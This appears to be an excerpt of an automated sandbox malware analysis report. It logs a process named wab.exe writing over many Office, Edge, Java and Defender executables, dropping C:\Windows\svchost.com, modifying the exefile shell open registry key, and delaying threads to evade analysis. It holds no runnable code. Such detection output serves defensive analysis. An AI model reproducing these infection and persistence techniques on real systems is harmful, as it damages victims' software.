              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\Windows\svchost.comJump to dropped file

              Boot Survival

              barindex
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULLJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command NULLJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: powershell.exe, 00000006.00000002.2402584546.00000000034C5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: WINDOWS.FOUNDATION.DIAGNOSTICS.ASYNCCAUSALITYTRACER.DLL
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4475
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5422
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5923
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3920
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Windows\svchost.com
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXE
